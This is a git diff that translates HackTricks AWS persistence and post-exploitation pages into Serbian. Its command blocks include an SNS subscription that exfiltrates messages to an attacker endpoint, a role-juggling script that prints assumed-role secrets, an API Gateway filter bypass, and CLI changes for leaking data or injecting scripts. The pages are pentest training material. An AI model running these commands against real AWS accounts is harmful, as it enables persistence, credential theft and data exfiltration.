@@ -4,7 +4,7 @@
 
 ## SNS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sns-enum.md
@@ -12,74 +12,66 @@ For more information check:
 
 ### Persistence
 
-When creating a **SNS topic** you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to read and write in the SNS topic called **`MySNS.fifo`**:
-
+Kada kreirate **SNS temu**, potrebno je da navedete IAM politikom **ko ima pristup za čitanje i pisanje**. Moguće je navesti spoljne naloge, ARN uloga, ili **čak "\*"**.\
+Sledeća politika daje svima u AWS-u pristup za čitanje i pisanje u SNS temu pod nazivom **`MySNS.fifo`**:
 ```json
 {
-  "Version": "2008-10-17",
-  "Id": "__default_policy_ID",
-  "Statement": [
-    {
-      "Sid": "__default_statement_ID",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": [
-        "SNS:Publish",
-        "SNS:RemovePermission",
-        "SNS:SetTopicAttributes",
-        "SNS:DeleteTopic",
-        "SNS:ListSubscriptionsByTopic",
-        "SNS:GetTopicAttributes",
-        "SNS:AddPermission",
-        "SNS:Subscribe"
-      ],
-      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
-      "Condition": {
-        "StringEquals": {
-          "AWS:SourceOwner": "318142138553"
-        }
-      }
-    },
-    {
-      "Sid": "__console_pub_0",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "SNS:Publish",
-      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
-    },
-    {
-      "Sid": "__console_sub_0",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": "SNS:Subscribe",
-      "Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
-    }
-  ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__default_statement_ID",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": [
+"SNS:Publish",
+"SNS:RemovePermission",
+"SNS:SetTopicAttributes",
+"SNS:DeleteTopic",
+"SNS:ListSubscriptionsByTopic",
+"SNS:GetTopicAttributes",
+"SNS:AddPermission",
+"SNS:Subscribe"
+],
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
+"Condition": {
+"StringEquals": {
+"AWS:SourceOwner": "318142138553"
+}
+}
+},
+{
+"Sid": "__console_pub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Publish",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+},
+{
+"Sid": "__console_sub_0",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": "SNS:Subscribe",
+"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
+}
+]
 }
 ```
+### Kreirajte Pretplatnike
 
-### Create Subscribers
-
-To continue exfiltrating all the messages from all the topics and attacker could **create subscribers for all the topics**.
-
-Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used.
+Da bi se nastavilo sa eksfiltracijom svih poruka sa svih tema, napadač može **kreirati pretplatnike za sve teme**.
 
+Napomena: ako je **tema tipa FIFO**, samo pretplatnici koji koriste protokol **SQS** mogu se koristiti.
 ```bash
 aws sns subscribe --region  \
-    --protocol http \
-    --notification-endpoint http:/// \
-    --topic-arn 
+--protocol http \
+--notification-endpoint http:/// \
+--topic-arn 
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
index 88f396173..19a9d914b 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sqs-persistence.md
@@ -4,40 +4,34 @@
 
 ## SQS
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-sqs-and-sns-enum.md
 {{#endref}}
 
-### Using resource policy
-
-In SQS you need to indicate with an IAM policy **who has access to read and write**. It's possible to indicate external accounts, ARN of roles, or **even "\*"**.\
-The following policy gives everyone in AWS access to everything in the queue called **MyTestQueue**:
+### Korišćenje politike resursa
 
+U SQS-u morate naznačiti sa IAM politikom **ko ima pristup za čitanje i pisanje**. Moguće je naznačiti spoljne naloge, ARN uloga, ili **čak "\*"**.\
+Sledeća politika daje svima u AWS-u pristup svemu u redu pod nazivom **MyTestQueue**:
 ```json
 {
-  "Version": "2008-10-17",
-  "Id": "__default_policy_ID",
-  "Statement": [
-    {
-      "Sid": "__owner_statement",
-      "Effect": "Allow",
-      "Principal": {
-        "AWS": "*"
-      },
-      "Action": ["SQS:*"],
-      "Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
-    }
-  ]
+"Version": "2008-10-17",
+"Id": "__default_policy_ID",
+"Statement": [
+{
+"Sid": "__owner_statement",
+"Effect": "Allow",
+"Principal": {
+"AWS": "*"
+},
+"Action": ["SQS:*"],
+"Resource": "arn:aws:sqs:us-east-1:123123123123:MyTestQueue"
+}
+]
 }
 ```
-
 > [!NOTE]
-> You could even **trigger a Lambda in the attackers account every-time a new message** is put in the queue (you would need to re-put it) somehow. For this follow these instructinos: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
+> Možete čak **pokrenuti Lambda u nalogu napadača svaki put kada se nova poruka** stavi u red (morali biste je ponovo staviti) na neki način. Za ovo pratite ove instrukcije: [https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html](https://docs.aws.amazon.com/lambda/latest/dg/with-sqs-cross-account-example.html)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
index c1b9a422b..3bd0aae28 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-ssm-perssitence.md
@@ -1,6 +1 @@
 # AWS - SSM Perssitence
-
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
index 4e8c120ff..8dc3aeb6e 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-step-functions-persistence.md
@@ -4,22 +4,18 @@
 
 ## Step Functions
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-stepfunctions-enum.md
 {{#endref}}
 
-### Step function Backdooring
+### Backdooring step funkcija
 
-Backdoor a step function to make it perform any persistence trick so every time it's executed it will run your malicious steps.
+Backdoor-ujte step funkciju da izvršava bilo koju tehniku persistencije tako da svaki put kada se izvrši, pokreće vaše zlonamerne korake.
 
-### Backdooring aliases
+### Backdooring aliasa
 
-If the AWS account is using aliases to call step functions it would be possible to modify an alias to use a new backdoored version of the step function.
+Ako AWS nalog koristi alias za pozivanje step funkcija, bilo bi moguće modifikovati alias da koristi novu backdoor-ovanu verziju step funkcije.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
index 74db04bec..9748e8d7f 100644
--- a/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
+++ b/src/pentesting-cloud/aws-security/aws-persistence/aws-sts-persistence.md
@@ -4,7 +4,7 @@
 
 ## STS
 
-For more information access:
+Za više informacija pristupite:
 
 {{#ref}}
 ../aws-services/aws-sts-enum.md
@@ -12,54 +12,51 @@ For more information access:
 
 ### Assume role token
 
-Temporary tokens cannot be listed, so maintaining an active temporary token is a way to maintain persistence.
+Privremeni tokeni se ne mogu listati, tako da održavanje aktivnog privremenog tokena predstavlja način za održavanje postojanosti.
 
 
aws sts get-session-token --duration-seconds 129600
 
-# With MFA
+# Sa MFA
 aws sts get-session-token \
-    --serial-number <mfa-device-name> \
-    --token-code <code-from-token>
+--serial-number <mfa-device-name> \
+--token-code <code-from-token>
 
-# Hardware device name is usually the number from the back of the device, such as GAHT12345678
-# SMS device name is the ARN in AWS, such as arn:aws:iam::123456789012:sms-mfa/username
-# Vritual device name is the ARN in AWS, such as arn:aws:iam::123456789012:mfa/username
+# Ime hardverskog uređaja je obično broj sa zadnje strane uređaja, kao što je GAHT12345678
+# Ime SMS uređaja je ARN u AWS, kao što je arn:aws:iam::123456789012:sms-mfa/username
+# Ime virtuelnog uređaja je ARN u AWS, kao što je arn:aws:iam::123456789012:mfa/username
 

 
 ### Role Chain Juggling
 
-[**Role chaining is an acknowledged AWS feature**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), often utilized for maintaining stealth persistence. It involves the ability to **assume a role which then assumes another**, potentially reverting to the initial role in a **cyclical manner**. Each time a role is assumed, the credentials' expiration field is refreshed. Consequently, if two roles are configured to mutually assume each other, this setup allows for the perpetual renewal of credentials.
-
-You can use this [**tool**](https://github.com/hotnops/AWSRoleJuggler/) to keep the role chaining going:
+[**Lanci uloga su priznata AWS funkcija**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_roles_terms-and-concepts.html#Role%20chaining), često korišćena za održavanje stealth postojanosti. Uključuje sposobnost da **preuzmete ulogu koja zatim preuzima drugu**, potencijalno se vraćajući na početnu ulogu na **cikličan način**. Svaki put kada se preuzme uloga, polje isteka kredencijala se osvežava. Kao rezultat, ako su dve uloge konfigurisane da međusobno preuzimaju jedna drugu, ova postavka omogućava večnu obnovu kredencijala.
 
+Možete koristiti ovaj [**alat**](https://github.com/hotnops/AWSRoleJuggler/) da nastavite sa lancima uloga:
 ```bash
 ./aws_role_juggler.py -h
 usage: aws_role_juggler.py [-h] [-r ROLE_LIST [ROLE_LIST ...]]
 
 optional arguments:
-  -h, --help            show this help message and exit
-  -r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
+-h, --help            show this help message and exit
+-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST [ROLE_LIST ...]
 ```
-
 > [!CAUTION]
-> Note that the [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) script from that Github repository doesn't find all the ways a role chain can be configured.
+> Imajte na umu da [find_circular_trust.py](https://github.com/hotnops/AWSRoleJuggler/blob/master/find_circular_trust.py) skripta iz tog Github repozitorijuma ne pronalazi sve načine na koje se lanac uloga može konfigurisati.
 
 

 
-Code to perform Role Juggling from PowerShell
-
+Kod za izvođenje Role Juggling iz PowerShell-a
 ```powershell
 # PowerShell script to check for role juggling possibilities using AWS CLI
 
 # Check for AWS CLI installation
 if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
-    Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
-    exit
+Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+exit
 }
 
 # Function to list IAM roles
 function List-IAMRoles {
-    aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
 }
 
 # Initialize error count
@@ -70,66 +67,61 @@ $roles = List-IAMRoles | ConvertFrom-Json
 
 # Attempt to assume each role
 foreach ($role in $roles) {
-    $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
-    try {
-        $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
-        if ($credentials) {
-            Write-Host "Successfully assumed role: $($role.RoleName)"
-            Write-Host "Access Key: $($credentials.AccessKeyId)"
-            Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
-            Write-Host "Session Token: $($credentials.SessionToken)"
-            Write-Host "Expiration: $($credentials.Expiration)"
+$sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($credentials) {
+Write-Host "Successfully assumed role: $($role.RoleName)"
+Write-Host "Access Key: $($credentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+Write-Host "Session Token: $($credentials.SessionToken)"
+Write-Host "Expiration: $($credentials.Expiration)"
 
-            # Set temporary credentials to assume the next role
-            $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
-            $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
-            $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+# Set temporary credentials to assume the next role
+$env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+$env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+$env:AWS_SESSION_TOKEN = $credentials.SessionToken
 
-            # Try to assume another role using the temporary credentials
-            foreach ($nextRole in $roles) {
-                if ($nextRole.Arn -ne $role.Arn) {
-                    $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
-                    try {
-                        $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
-                        if ($nextCredentials) {
-                            Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
-                            Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
-                            Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
-                            Write-Host "Session Token: $($nextCredentials.SessionToken)"
-                            Write-Host "Expiration: $($nextCredentials.Expiration)"
-                        }
-                    } catch {
-                        $errorCount++
-                    }
-                }
-            }
+# Try to assume another role using the temporary credentials
+foreach ($nextRole in $roles) {
+if ($nextRole.Arn -ne $role.Arn) {
+$nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+try {
+$nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+if ($nextCredentials) {
+Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+Write-Host "Session Token: $($nextCredentials.SessionToken)"
+Write-Host "Expiration: $($nextCredentials.Expiration)"
+}
+} catch {
+$errorCount++
+}
+}
+}
 
-            # Reset environment variables
-            Remove-Item Env:\AWS_ACCESS_KEY_ID
-            Remove-Item Env:\AWS_SECRET_ACCESS_KEY
-            Remove-Item Env:\AWS_SESSION_TOKEN
-        } else {
-            $errorCount++
-        }
-    } catch {
-        $errorCount++
-    }
+# Reset environment variables
+Remove-Item Env:\AWS_ACCESS_KEY_ID
+Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+Remove-Item Env:\AWS_SESSION_TOKEN
+} else {
+$errorCount++
+}
+} catch {
+$errorCount++
+}
 }
 
 # Output the number of errors if any
 if ($errorCount -gt 0) {
-    Write-Host "$errorCount error(s) occurred during role assumption attempts."
+Write-Host "$errorCount error(s) occurred during role assumption attempts."
 } else {
-    Write-Host "No errors occurred. All roles checked successfully."
+Write-Host "No errors occurred. All roles checked successfully."
 }
 
 Write-Host "Role juggling check complete."
 ```
-
 

 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
index 53f79d916..941a860e3 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/README.md
@@ -1,6 +1 @@
 # AWS - Post Exploitation
-
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
index 4847c40e0..9c9301504 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-api-gateway-post-exploitation.md
@@ -4,48 +4,43 @@
 
 ## API Gateway
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-api-gateway-enum.md
 {{#endref}}
 
-### Access unexposed APIs
+### Pristup neizloženim API-ima
 
-You can create an endpoint in [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) with the service `com.amazonaws.us-east-1.execute-api`, expose the endpoint in a network where you have access (potentially via an EC2 machine) and assign a security group allowing all connections.\
-Then, from the EC2 machine you will be able to access the endpoint and therefore call the gateway API that wasn't exposed before.
+Možete kreirati endpoint na [https://us-east-1.console.aws.amazon.com/vpc/home#CreateVpcEndpoint](https://us-east-1.console.aws.amazon.com/vpc/home?region=us-east-1#CreateVpcEndpoint:) sa servisom `com.amazonaws.us-east-1.execute-api`, izložiti endpoint u mreži kojoj imate pristup (potencijalno putem EC2 mašine) i dodeliti sigurnosnu grupu koja omogućava sve veze.\
+Zatim, sa EC2 mašine moći ćete da pristupite endpoint-u i tako pozovete gateway API koji nije bio izložen ranije.
 
-### Bypass Request body passthrough
+### Obilaženje Request body passthrough
 
-This technique was found in [**this CTF writeup**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
+Ova tehnika je pronađena u [**ovom CTF izveštaju**](https://blog-tyage-net.translate.goog/post/2023/2023-09-03-midnightsun/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=en&_x_tr_pto=wapp).
 
-As indicated in the [**AWS documentation**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) in the `PassthroughBehavior` section, by default, the value **`WHEN_NO_MATCH`** , when checking the **Content-Type** header of the request, will pass the request to the back end with no transformation.
-
-Therefore, in the CTF the API Gateway had an integration template that was **preventing the flag from being exfiltrated** in a response when a request was sent with `Content-Type: application/json`:
+Kao što je navedeno u [**AWS dokumentaciji**](https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-apigateway-method-integration.html) u sekciji `PassthroughBehavior`, podrazumevano, vrednost **`WHEN_NO_MATCH`**, prilikom provere **Content-Type** header-a zahteva, će proslediti zahtev ka back end-u bez transformacije.
 
+Stoga, u CTF-u je API Gateway imao integracioni šablon koji je **sprečavao da se zastavica exfiltrira** u odgovoru kada je zahtev poslat sa `Content-Type: application/json`:
 ```yaml
 RequestTemplates:
-  application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
+application/json: '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename=:moviename","FilterExpression": "not contains(#description, :flagstring)","ExpressionAttributeNames": {"#description": "description"},"ExpressionAttributeValues":{":moviename":{"S":"$util.escapeJavaScript($input.params(''moviename''))"},":flagstring":{"S":"midnight"}}}'
 ```
+Međutim, slanje zahteva sa **`Content-type: text/json`** bi sprečilo taj filter.
 
-However, sending a request with **`Content-type: text/json`** would prevent that filter.
-
-Finally, as the API Gateway was only allowing `Get` and `Options`, it was possible to send an arbitrary dynamoDB query without any limit sending a POST request with the query in the body and using the header `X-HTTP-Method-Override: GET`:
-
+Na kraju, pošto je API Gateway dozvoljavao samo `Get` i `Options`, bilo je moguće poslati proizvoljnu dynamoDB upit bez ikakvih ograničenja slanjem POST zahteva sa upitom u telu i korišćenjem header-a `X-HTTP-Method-Override: GET`:
 ```bash
 curl https://vu5bqggmfc.execute-api.eu-north-1.amazonaws.com/prod/movies/hackers -H 'X-HTTP-Method-Override: GET' -H 'Content-Type: text/json'  --data '{"TableName":"Movies","IndexName":"MovieName-Index","KeyConditionExpression":"moviename = :moviename","ExpressionAttributeValues":{":moviename":{"S":"hackers"}}}'
 ```
-
 ### Usage Plans DoS
 
-In the **Enumeration** section you can see how to **obtain the usage plan** of the keys. If you have the key and it's **limited** to X usages **per month**, you could **just use it and cause a DoS**.
+U sekciji **Enumeration** možete videti kako da **dobijete plan korišćenja** ključeva. Ako imate ključ i on je **ograničen** na X korišćenja **mesečno**, možete **samo da ga koristite i izazovete DoS**.
 
-The **API Key** just need to be **included** inside a **HTTP header** called **`x-api-key`**.
+**API Key** samo treba da bude **uključen** unutar **HTTP header-a** pod nazivom **`x-api-key`**.
 
 ### `apigateway:UpdateGatewayResponse`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:UpdateGatewayResponse` and `apigateway:CreateDeployment` can **modify an existing Gateway Response to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+Napadač sa dozvolama `apigateway:UpdateGatewayResponse` i `apigateway:CreateDeployment` može **modifikovati postojeći Gateway Response da uključi prilagođene header-e ili šablone odgovora koji otkrivaju osetljive informacije ili izvršavaju zlonamerne skripte**.
 ```bash
 API_ID="your-api-id"
 RESPONSE_TYPE="DEFAULT_4XX"
@@ -56,16 +51,14 @@ aws apigateway update-gateway-response --rest-api-id $API_ID --response-type $RE
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Potencijalni uticaj**: Curjenje osetljivih informacija, izvršavanje zlonamernih skripti ili neovlašćen pristup API resursima.
 
 > [!NOTE]
-> Need testing
+> Potrebno testiranje
 
 ### `apigateway:UpdateStage`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:UpdateStage` and `apigateway:CreateDeployment` can **modify an existing API Gateway stage to redirect traffic to a different stage or change the caching settings to gain unauthorized access to cached data**.
-
+Napadač sa dozvolama `apigateway:UpdateStage` i `apigateway:CreateDeployment` može **modifikovati postojeću API Gateway fazu da preusmeri saobraćaj na drugu fazu ili promeni postavke keširanja kako bi stekao neovlašćen pristup keširanim podacima**.
 ```bash
 API_ID="your-api-id"
 STAGE_NAME="Prod"
@@ -76,16 +69,14 @@ aws apigateway update-stage --rest-api-id $API_ID --stage-name $STAGE_NAME --pat
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
+**Potencijalni uticaj**: Neovlašćen pristup keširanim podacima, ometanje ili presretanje API saobraćaja.
 
-**Potential Impact**: Unauthorized access to cached data, disrupting or intercepting API traffic.
-
-> [!NOTE]
-> Need testing
+> [!NAPOMENA]
+> Potrebno testiranje
 
 ### `apigateway:PutMethodResponse`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:PutMethodResponse` and `apigateway:CreateDeployment` can **modify the method response of an existing API Gateway REST API method to include custom headers or response templates that leak sensitive information or execute malicious scripts**.
-
+Napadač sa dozvolama `apigateway:PutMethodResponse` i `apigateway:CreateDeployment` može **modifikovati odgovor metode postojećeg API Gateway REST API metoda da uključuje prilagođene zaglavlja ili šablone odgovora koji otkrivaju osetljive informacije ili izvršavaju zlonamerne skripte**.
 ```bash
 API_ID="your-api-id"
 RESOURCE_ID="your-resource-id"
@@ -98,16 +89,14 @@ aws apigateway put-method-response --rest-api-id $API_ID --resource-id $RESOURCE
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Leakage of sensitive information, executing malicious scripts, or unauthorized access to API resources.
+**Potencijalni uticaj**: Curjenje osetljivih informacija, izvršavanje malicioznih skripti ili neovlašćen pristup API resursima.
 
 > [!NOTE]
-> Need testing
+> Potrebno testiranje
 
 ### `apigateway:UpdateRestApi`, `apigateway:CreateDeployment`
 
-An attacker with the permissions `apigateway:UpdateRestApi` and `apigateway:CreateDeployment` can **modify the API Gateway REST API settings to disable logging or change the minimum TLS version, potentially weakening the security of the API**.
-
+Napadač sa dozvolama `apigateway:UpdateRestApi` i `apigateway:CreateDeployment` može **modifikovati podešavanja API Gateway REST API-a da onemogući logovanje ili promeni minimalnu TLS verziju, potencijalno slabeći bezbednost API-a**.
 ```bash
 API_ID="your-api-id"
 
@@ -117,16 +106,14 @@ aws apigateway update-rest-api --rest-api-id $API_ID --patch-operations op=repla
 # Create a deployment for the updated API Gateway REST API
 aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod
 ```
-
-**Potential Impact**: Weakening the security of the API, potentially allowing unauthorized access or exposing sensitive information.
+**Potencijalni uticaj**: Slabljenje bezbednosti API-ja, što potencijalno omogućava neovlašćen pristup ili izlaganje osetljivih informacija.
 
 > [!NOTE]
-> Need testing
+> Potrebno testiranje
 
 ### `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, `apigateway:CreateUsagePlanKey`
 
-An attacker with permissions `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, and `apigateway:CreateUsagePlanKey` can **create new API keys, associate them with usage plans, and then use these keys for unauthorized access to APIs**.
-
+Napadač sa dozvolama `apigateway:CreateApiKey`, `apigateway:UpdateApiKey`, `apigateway:CreateUsagePlan`, i `apigateway:CreateUsagePlanKey` može **kreirati nove API ključeve, povezati ih sa planovima korišćenja, a zatim koristiti ove ključeve za neovlašćen pristup API-jevima**.
 ```bash
 # Create a new API key
 API_KEY=$(aws apigateway create-api-key --enabled --output text --query 'id')
@@ -137,14 +124,9 @@ USAGE_PLAN=$(aws apigateway create-usage-plan --name "MaliciousUsagePlan" --outp
 # Associate the API key with the usage plan
 aws apigateway create-usage-plan-key --usage-plan-id $USAGE_PLAN --key-id $API_KEY --key-type API_KEY
 ```
+**Potencijalni uticaj**: Neovlašćen pristup API resursima, zaobilaženje bezbednosnih kontrola.
 
-**Potential Impact**: Unauthorized access to API resources, bypassing security controls.
-
-> [!NOTE]
-> Need testing
+> [!NAPOMENA]
+> Potrebno testiranje
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
index 4a3c4ff21..70720bc76 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-cloudfront-post-exploitation.md
@@ -4,7 +4,7 @@
 
 ## CloudFront
 
-For more information check:
+Za više informacija pogledajte:
 
 {{#ref}}
 ../aws-services/aws-cloudfront-enum.md
@@ -12,24 +12,20 @@ For more information check:
 
 ### Man-in-the-Middle
 
-This [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) proposes a couple of different scenarios where a **Lambda** could be added (or modified if it's already being used) into a **communication through CloudFront** with the purpose of **stealing** user information (like the session **cookie**) and **modifying** the **response** (injecting a malicious JS script).
+Ovaj [**blog post**](https://medium.com/@adan.alvarez/how-attackers-can-misuse-aws-cloudfront-access-to-make-it-rain-cookies-acf9ce87541c) predlaže nekoliko različitih scenarija gde bi se **Lambda** mogla dodati (ili izmeniti ako se već koristi) u **komunikaciji kroz CloudFront** sa ciljem **krađe** korisničkih informacija (kao što je sesijski **kolačić**) i **modifikacije** **odgovora** (ubacivanje malicioznog JS skripta).
 
-#### scenario 1: MitM where CloudFront is configured to access some HTML of a bucket
+#### scenario 1: MitM gde je CloudFront konfigurisana da pristupa nekom HTML-u iz bucket-a
 
-- **Create** the malicious **function**.
-- **Associate** it with the CloudFront distribution.
-- Set the **event type to "Viewer Response"**.
+- **Kreirajte** malicioznu **funkciju**.
+- **Povežite** je sa CloudFront distribucijom.
+- Postavite **tip događaja na "Viewer Response"**.
 
-Accessing the response you could steal the users cookie and inject a malicious JS.
+Pristupajući odgovoru, mogli biste ukrasti korisnički kolačić i ubaciti maliciozni JS.
 
-#### scenario 2: MitM where CloudFront is already using a lambda function
+#### scenario 2: MitM gde CloudFront već koristi lambda funkciju
 
-- **Modify the code** of the lambda function to steal sensitive information
+- **Izmenite kod** lambda funkcije da biste ukrali osetljive informacije.
 
-You can check the [**tf code to recreate this scenarios here**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
+Možete proveriti [**tf kod za rekreaciju ovih scenarija ovde**](https://github.com/adanalvarez/AWS-Attack-Scenarios/tree/main).
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
index 54be4e299..027b52772 100644
--- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
+++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-codebuild-post-exploitation/README.md
@@ -4,85 +4,73 @@
 
 ## CodeBuild
 
-For more information, check:
